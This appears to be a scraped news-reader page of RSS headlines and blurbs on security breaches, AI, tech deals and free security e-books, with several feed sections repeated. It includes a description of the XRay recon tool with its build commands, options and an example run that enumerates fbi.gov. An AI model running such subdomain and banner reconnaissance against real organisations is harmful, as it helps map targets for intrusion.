News Reader

News Reader

RSS tabs below. Last time of page update: 2025-11-27 23:17:51 GMT+0 Click Here to refresh the page.

START

Select a tab to begin reading.

Tech RSS feeds

Below are tech sites.

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

One Identity Safeguard Named a Visionary in the 2025 Gartner Magic Quadrant for PAM
INE Expands Cross-Skilling Innovations

Cary, North Carolina, USA, 26th November 2025, CyberNewsWire

INE Expands Cross-Skilling Innovations on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 26 Nov 2025 14:01:00 +0000

How MSPs Can Cut Response Time by 60% — and Stop Losing Alerts (While Keeping Backups Safe)

For Managed Service Providers (MSPs), minutes may even define success or failure. Many a time…

How MSPs Can Cut Response Time by 60% — and Stop Losing Alerts (While Keeping Backups Safe) on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 21 Nov 2025 15:30:03 +0000

Latest news

We found the 70+ best Black Friday TV deals, and we're tracking them live

Black Friday is practically here, and we're following great live deals on TVs, streaming bundles, and home theater equipment from Samsung, Sony, and more.

Article link

Date of publish: Thu, 27 Nov 2025 23:05:50 GMT

I'm saving up to 75% off on the best Black Friday deals from Amazon, Walmart, Target & more

Black Friday is tomorrow, and nearly every major retailer is offering big discounts, like Disney+ and Hulu for only $4.99 a month.

Article link

Date of publish: Thu, 27 Nov 2025 23:04:21 GMT

I found the best Black Friday gaming PC deals on desktops, laptops, and more

Black Friday is nearly here, but you can already get a jump on your holiday shopping list with great deals on gaming desktop PCs, monitors, SSDs, and more.

Article link

Date of publish: Thu, 27 Nov 2025 23:03:58 GMT

NYT > Technology

A.I. Can Do More of Your Shopping This Holiday Season

New tools and features from retailers and tech companies use artificial intelligence to help people find gifts and make decisions about their shopping lists.

Article link

Date of publish: Tue, 25 Nov 2025 10:01:58 +0000

What OpenAI Did When ChatGPT Users Lost Touch With Reality

In tweaking its chatbot to appeal to more people, OpenAI made it riskier for some of them. Now the company has made its chatbot safer. Will that undermine its quest for growth?

Article link

Date of publish: Tue, 25 Nov 2025 00:04:12 +0000

RealPage Agrees to Settle Federal Rent-Collusion Case

The Justice Department had accused the real estate software company of enabling landlords to charge tenants more than free-market rates.

Article link

Date of publish: Tue, 25 Nov 2025 00:39:54 +0000

BleepingComputer

OpenAI discloses API customer data breach via Mixpanel vendor hack

OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel. [...]

Article link

Date of publish: Thu, 27 Nov 2025 06:27:06 -0500

New ShadowV2 botnet malware used AWS outage as a test opportunity

A new Mirai-based botnet malware named 'ShadowV2' has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. [...]

Article link

Date of publish: Wed, 26 Nov 2025 17:24:14 -0500

NordVPN Black Friday Deal: Unlock 77% off VPN plans in 2025

The NordVPN Black Friday Deal is now live, and you can get the best discount available: 77% off that applies automatically when you follow our link. If you've been waiting for the right moment to upgrade your online security, privacy, and streaming freedom, this is the one VPN deals this Black Friday. [...]

Article link

Date of publish: Wed, 26 Nov 2025 15:00:37 -0500

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Hacker News: Front Page

250MWh 'Sand Battery' to start construction in Finland
FileZilla Pro "Perpetual License" – A Warning to All Users

Article URL: https://github.com/x011/FileZilla-Pro-Download

Comments URL: https://news.ycombinator.com/item?id=46073279

Points: 64

# Comments: 26

Article link

Date of publish: Thu, 27 Nov 2025 21:13:39 +0000

Underrated reasons to be thankful V

Article URL: https://dynomight.net/thanks-5/

Comments URL: https://news.ycombinator.com/item?id=46073033

Points: 75

# Comments: 36

Article link

Date of publish: Thu, 27 Nov 2025 20:37:51 +0000

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

One Identity Safeguard Named a Visionary in the 2025 Gartner Magic Quadrant for PAM
INE Expands Cross-Skilling Innovations

Cary, North Carolina, USA, 26th November 2025, CyberNewsWire

INE Expands Cross-Skilling Innovations on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 26 Nov 2025 14:01:00 +0000

How MSPs Can Cut Response Time by 60% — and Stop Losing Alerts (While Keeping Backups Safe)

For Managed Service Providers (MSPs), minutes may even define success or failure. Many a time…

How MSPs Can Cut Response Time by 60% — and Stop Losing Alerts (While Keeping Backups Safe) on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 21 Nov 2025 15:30:03 +0000

Mozilla Firefox 145 Rolls Out With Advanced Fingerprint Protection

Taking another leap towards securing users’ digital privacy, Mozilla rolls out Firefox 145 with enhanced…

Mozilla Firefox 145 Rolls Out With Advanced Fingerprint Protection on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 20 Nov 2025 11:06:54 +0000

Seraphic Becomes the First and Only Secure Enterprise Browser Solution to Protect Electron-Based Applications
When Language Speaks Faster Than We Can Type: The Rise of Smart Speech-to-Text Tools

If you pay attention to how people communicate now, it’s pretty clear that talking has…

When Language Speaks Faster Than We Can Type: The Rise of Smart Speech-to-Text Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 13 Nov 2025 17:10:27 +0000

Best Six Test Data Management Tools

Test data management (TDM) is the process of handling and preparing the data used for…

Best Six Test Data Management Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 13 Nov 2025 16:53:54 +0000

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS

After the recent update, WhatsApp users can experience passkey-secured backups for their conversations. WhatsApp has…

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 06 Nov 2025 13:05:53 +0000

Aembit Introduces Identity and Access Management for Agentic AI

Silver Spring, USA/ Maryland, 30th October 2025, CyberNewsWire

Aembit Introduces Identity and Access Management for Agentic AI on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 30 Oct 2025 12:02:02 +0000

How Small Security Teams Can Improve Vulnerability Management

Small security teams are often putting out fires, and as a result, burning out fast.…

How Small Security Teams Can Improve Vulnerability Management on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 29 Oct 2025 11:13:51 +0000

Latest news

We found the 70+ best Black Friday TV deals, and we're tracking them live

Black Friday is practically here, and we're following great live deals on TVs, streaming bundles, and home theater equipment from Samsung, Sony, and more.

Article link

Date of publish: Thu, 27 Nov 2025 23:05:50 GMT

I'm saving up to 75% off on the best Black Friday deals from Amazon, Walmart, Target & more

Black Friday is tomorrow, and nearly every major retailer is offering big discounts, like Disney+ and Hulu for only $4.99 a month.

Article link

Date of publish: Thu, 27 Nov 2025 23:04:21 GMT

I found the best Black Friday gaming PC deals on desktops, laptops, and more

Black Friday is nearly here, but you can already get a jump on your holiday shopping list with great deals on gaming desktop PCs, monitors, SSDs, and more.

Article link

Date of publish: Thu, 27 Nov 2025 23:03:58 GMT

Best Black Friday Apple deals 2025: I'm tracking the best discounts iPhones, iPads, and more

Black Friday is tomorrow. This is the best time to take advantage of discounts on Apple devices.

Article link

Date of publish: Thu, 27 Nov 2025 22:59:39 GMT

Best Black Friday iPad deals 2025: Get up to 25% off an iPad

Now is the time to snag a great deal on an iPad, iPad Air, iPad Pro and more!

Article link

Date of publish: Thu, 27 Nov 2025 22:39:16 GMT

I rounded up 30+ of the best Black Friday Sam's Club deals of 2025

Black Friday is a few hours away, but many great deals are already live at Sam's Club to help you save on tech, laptops, TVs, and household appliances.

Article link

Date of publish: Thu, 27 Nov 2025 22:36:18 GMT

Best Buy's Black Friday sale is underway: Shop my favorite 30+ tech discounts live now

Black Friday is tomorrow, but my favorite Best Buy deals are already live, like the Hisense Canvas TV for 35% off.

Article link

Date of publish: Thu, 27 Nov 2025 22:22:29 GMT

Walmart's Black Friday deals are live now - these are the 50 best sales I've found

It's official: Walmart has the best Black Friday deals, and we've rounded them up for you.

Article link

Date of publish: Thu, 27 Nov 2025 22:19:09 GMT

I found the 20 best Black Friday PlayStation 5 deals for 2025 - don't let these slip past you

Black Friday is tomorrow, but you can already find great PlayStation deals now from Amazon, Target, Walmart, and others. I've collected some of the best.

Article link

Date of publish: Thu, 27 Nov 2025 22:04:10 GMT

Best Black Friday Nintendo Switch deals 2025: I handpicked the 20 best discounts out now

Black Friday is only a few hours away, and Nintendo Switch deals are already live. I've collected the best from Walmart, Best Buy, and more.

Article link

Date of publish: Thu, 27 Nov 2025 21:53:15 GMT

I found the best Chromebook deals for Black Friday 2025 - here are the 20 worth buying now

Black Friday is in a few hours, and I've collected the best early Chromebook deals across major retailers.

Article link

Date of publish: Thu, 27 Nov 2025 21:43:13 GMT

I found the best Apple Watch deals for Black Friday 2025

Shop these Black Friday deals on Apple Watch, including the new Series 11 and SE 3 while they last.

Article link

Date of publish: Thu, 27 Nov 2025 21:32:12 GMT

Best Black Friday smart glasses deals 2025: I found the biggest sales like Meta Ray-Bans for 20% off

If you've been wanting to check out the smart glasses craze for yourself, you can score a great Black Friday right now.

Article link

Date of publish: Thu, 27 Nov 2025 21:07:57 GMT

I'm ready to binge with Black Friday streaming deals as low as $3 on Hulu, Peacock, and HBO Max

Cut the cord once and for all with these unbeatable Black Friday deals on the most popular streaming services.

Article link

Date of publish: Thu, 27 Nov 2025 20:06:47 GMT

I've tested dozens of robot vacuums, but these are the Black Friday deals I'd actually buy

I hand-picked the best Black Friday deals on robot vacuums that are actually worth your money.

Article link

Date of publish: Thu, 27 Nov 2025 19:52:03 GMT

The 20+ best Black Friday headphones deals, hand-picked by an audio reviewer

Black Friday is the best time to upgrade your headphones or earbuds. Here are the best deals we've found from Sony, Bose, Apple, and more.

Article link

Date of publish: Thu, 27 Nov 2025 19:44:47 GMT

This fancy automatic espresso machine made me drop my Dunkin' habit - and it's on a rare discount

The De'Longhi Rivelia is a fully automatic espresso machine that can produce a wide range of beverages, from coffee to lattes and cappuccinos. And right now, it's 20% off for Black Friday.

Article link

Date of publish: Thu, 27 Nov 2025 19:43:09 GMT

The best Black Friday streaming deal is Walmart+ for 50% off (with access to free Peacock or Paramount+)

Looking to save on streaming? A Walmart+ membership is currently $49 per year, and it includes a subscription to either Paramount+ or Peacock.

Article link

Date of publish: Thu, 27 Nov 2025 19:17:00 GMT

Best Black Friday laptop deals 2025: 26 sales live now on MacBooks, Lenovo, HP, more

I'm tracking 26 of the best Black Friday deals on laptops I've seen so far, including the new MacBook Air M4 for 25% off.

Article link

Date of publish: Thu, 27 Nov 2025 19:14:33 GMT

I found the 15+ best Black Friday phone deals (which carrier offers are actually worth it)

Black Friday sales are already underway at popular carrier stores.

Article link

Date of publish: Thu, 27 Nov 2025 18:59:47 GMT

NYT > Technology

A.I. Can Do More of Your Shopping This Holiday Season

New tools and features from retailers and tech companies use artificial intelligence to help people find gifts and make decisions about their shopping lists.

Article link

Date of publish: Tue, 25 Nov 2025 10:01:58 +0000

What OpenAI Did When ChatGPT Users Lost Touch With Reality

In tweaking its chatbot to appeal to more people, OpenAI made it riskier for some of them. Now the company has made its chatbot safer. Will that undermine its quest for growth?

Article link

Date of publish: Tue, 25 Nov 2025 00:04:12 +0000

RealPage Agrees to Settle Federal Rent-Collusion Case

The Justice Department had accused the real estate software company of enabling landlords to charge tenants more than free-market rates.

Article link

Date of publish: Tue, 25 Nov 2025 00:39:54 +0000

The Fate of Google’s Ad Tech Monopoly Is Now in a Judge’s Hands

A judge queried lawyers about whether a breakup made sense during closing arguments on how to fix the tech giant’s dominance in online advertising.

Article link

Date of publish: Fri, 21 Nov 2025 20:43:22 +0000

The Writer Who Dared Criticize Silicon Valley

Paulina Borsook’s “Cyberselfish,” which offered dire predictions about the tech world’s love for libertarianism, is finding fans. It only took 25 years.

Article link

Date of publish: Thu, 27 Nov 2025 13:10:22 +0000

David Lerner, a Mr. Fix-it of Apple Computers, Dies at 72

He and a partner founded Tekserve, a Manhattan emergency room for frozen hard drives, keyboards, screens and their confounded owners.

Article link

Date of publish: Wed, 26 Nov 2025 21:22:35 +0000

Take Command of Your Powerful New Smartphone Camera

This year’s high-end models from Apple and Google raise the bar for mobile photography, but users should take the time to learn the settings and features.

Article link

Date of publish: Wed, 26 Nov 2025 14:00:12 +0000

Fears About A.I. Prompt Talks of Super PACs to Rein In the Industry

As artificial intelligence companies prepare to pour money into the midterm elections, some in the A.I. world are hatching plans of their own to curb the industry’s influence.

Article link

Date of publish: Wed, 26 Nov 2025 16:30:41 +0000

The Interview: How Wikipedia Is Responding to the Culture Wars

Attacks against the site are piling up. Its co-founder says, Trust the process.

Article link

Date of publish: Tue, 25 Nov 2025 12:00:10 +0000

What Is Agentic A.I., and Would You Trust It to Book a Flight?

Companies are racing to develop artificial intelligence tools that can make reservations for flights, hotels and more on your behalf. Here’s what to know.

Article link

Date of publish: Tue, 25 Nov 2025 10:02:35 +0000

I’m a Professor. A.I. Has Changed My Classroom, but Not for the Worse.

My students’ easy access to chatbots forced me to make humanities instruction even more human.

Article link

Date of publish: Tue, 25 Nov 2025 13:50:38 +0000

An Auto Holy Grail: Motors That Don’t Rely on Chinese Rare Earths

Weary of being captive to geopolitics, car companies are looking for ways to replace powerful rare-earth magnets in electric motors.

Article link

Date of publish: Tue, 25 Nov 2025 18:50:10 +0000

X Displays Users’ Locations, Fueling Scrutiny Over Political Accounts

Online sleuths quickly found that some accounts posting about U.S. politics, including those in support of the MAGA movement, appeared not to be based in the United States.

Article link

Date of publish: Mon, 24 Nov 2025 16:36:45 +0000

How OpenAI’s Changes Sent Some Users Spiraling

OpenAI adjusted ChatGPT’s settings, which left some users spiraling, according to our reporting. Kashmir Hill, who reports on technology and privacy, describes what the company has done about the users’ troubling reports.

Article link

Date of publish: Sun, 23 Nov 2025 10:01:32 +0000

A.I. Toy Bear Speaks of Sex, Knives and Pills, Consumer Group Warns

The chatter left startled adults unsure whether they heard correctly. Testers warned that interactive toys like this one could allow children to stray into inappropriate exchanges.

Article link

Date of publish: Sat, 22 Nov 2025 21:10:46 +0000

Cryptology Group Held an Election, but Can’t Decrypt the Results

A global group of researchers was unable to read the vote tally, after an official lost one of three secret code keys needed to unlock a hyper-secure election system.

Article link

Date of publish: Sat, 22 Nov 2025 01:52:09 +0000

We Asked Roblox’s C.E.O. About Child Safety. It Got Tense.

This week the company announced that it would require users to undergo an A.I.-powered age estimation process in order to chat with others on the platform. Will this change reassure parents?

Article link

Date of publish: Sat, 22 Nov 2025 00:37:44 +0000

The A.I. Boom Has Found Another Gear. Why Can’t People Shake Their Worries?

It is a time of superlatives in the tech industry, with historic profits, stock prices and deal prices. It’s enough to make some people very nervous.

Article link

Date of publish: Fri, 21 Nov 2025 01:34:51 +0000

Trump Elevates Once-Fringe Meme Makers to the Mainstream

Right-wing users have tapped A.I. tools to promote President Trump’s agenda. He took notice.

Article link

Date of publish: Thu, 20 Nov 2025 18:40:55 +0000

To Meld A.I. With Supercomputers, National Labs Are Picking Up the Pace

A.I. has added urgency to the U.S. national laboratories that have been sites of cutting-edge scientific research, leading to deals with tech giants like Nvidia to speed up.

Article link

Date of publish: Thu, 20 Nov 2025 16:01:52 +0000

BleepingComputer

OpenAI discloses API customer data breach via Mixpanel vendor hack

OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel. [...]

Article link

Date of publish: Thu, 27 Nov 2025 06:27:06 -0500

New ShadowV2 botnet malware used AWS outage as a test opportunity

A new Mirai-based botnet malware named 'ShadowV2' has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. [...]

Article link

Date of publish: Wed, 26 Nov 2025 17:24:14 -0500

NordVPN Black Friday Deal: Unlock 77% off VPN plans in 2025

The NordVPN Black Friday Deal is now live, and you can get the best discount available: 77% off that applies automatically when you follow our link. If you've been waiting for the right moment to upgrade your online security, privacy, and streaming freedom, this is the one VPN deals this Black Friday. [...]

Article link

Date of publish: Wed, 26 Nov 2025 15:00:37 -0500

Popular Forge library gets fix for signature verification bypass flaw

A vulnerability in the 'node-forge' package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid. [...]

Article link

Date of publish: Wed, 26 Nov 2025 14:32:42 -0500

Comcast to pay $1.5M fine for vendor breach affecting 270K customers

Comcast will pay a $1.5 million fine to settle a Federal Communications Commission investigation into a February 2024 vendor data breach that exposed the personal information of nearly 275,000 customers. [...]

Article link

Date of publish: Wed, 26 Nov 2025 13:30:10 -0500

Multiple London councils' IT systems disrupted by cyberattack

The Royal Borough of Kensington and Chelsea (RBKC) and the Westminster City Council (WCC) announced that they are experiencing service disruptions following a cybersecurity issue. [...]

Article link

Date of publish: Wed, 26 Nov 2025 12:26:11 -0500

Microsoft: Security keys may prompt for PIN after recent updates

Microsoft warned users on Tuesday that FIDO2 security keys may prompt them to enter a PIN when signing in after installing Windows updates released since the September 2025 preview update. [...]

Article link

Date of publish: Wed, 26 Nov 2025 09:43:57 -0500

Microsoft to secure Entra ID sign-ins from script injection attacks

Starting in mid-to-late October 2026, Microsoft will enhance the security of the Entra ID authentication system against external script injection attacks. [...]

Article link

Date of publish: Wed, 26 Nov 2025 08:26:06 -0500

ASUS warns of new critical auth bypass flaw in AiCloud routers

ASUS has released new firmware to patch nine security vulnerabilities, including a critical authentication bypass flaw in routers with AiCloud enabled. [...]

Article link

Date of publish: Wed, 26 Nov 2025 06:41:00 -0500

Passwork 7: Self-hosted password and secrets manager for enterprise teams

Passwork 7 unifies enterprise password and secrets management in a self-hosted platform. Organizations can automate credential workflows and test the full system with a free trial and up to 50% Black Friday savings. [...]

Article link

Date of publish: Wed, 26 Nov 2025 05:12:17 -0500

OnSolve CodeRED cyberattack disrupts emergency alert systems nationwide

Risk management company Crisis24 has confirmed its OnSolve CodeRED platform suffered a cyberattack that disrupted emergency notification systems used by state and local governments, police departments, and fire agencies across the United States. [...]

Article link

Date of publish: Tue, 25 Nov 2025 16:48:40 -0500

The Black Friday 2025 Cybersecurity, IT, VPN, & Antivirus Deals

Black Friday 2025 is almost here, and early deals are already live across security software, online courses, system administration tools, antivirus products, and VPN services. These discounts are limited-time offers and vary by provider, so if you see something that fits your needs, it's best to act while it's available. [...]

Article link

Date of publish: Tue, 25 Nov 2025 14:14:06 -0500

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Best Practices For Protecting Against Phishing, Ransomware and Email Fraud


"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"


Osterman Research conducted a survey among corporate decisions makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.

Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.

Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.

Article link

Date of publish: Mon, 25 Nov 2019 07:46:00 +0000

XRay - Using For Recon Mapping And OSINT Suite


XRay is a software for recon, mapping and OSINT gathering from public networks.

XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.

How Does it Work?

XRay is a very simple tool, it works this way:
  1. It'll bruteforce subdomains using a wordlist and DNS requests.
  2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
  3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
  4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
  5. Eventually the data is presented to the user on the web ui.

Grabbers and Collectors

  • HTTP Server, X-Powered-By and Location headers.
  • HTTP and HTTPS robots.txt disallowed entries.
  • HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
  • HTML title tag.
  • DNS version.bind. and hostname.bind. records.
  • MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Article link

Date of publish: Mon, 11 Nov 2019 09:53:00 +0000

Hacking for Dummies, 6th Edition ($29.99 Value) Free


"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"

Stop hackers before they hack you!


In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.

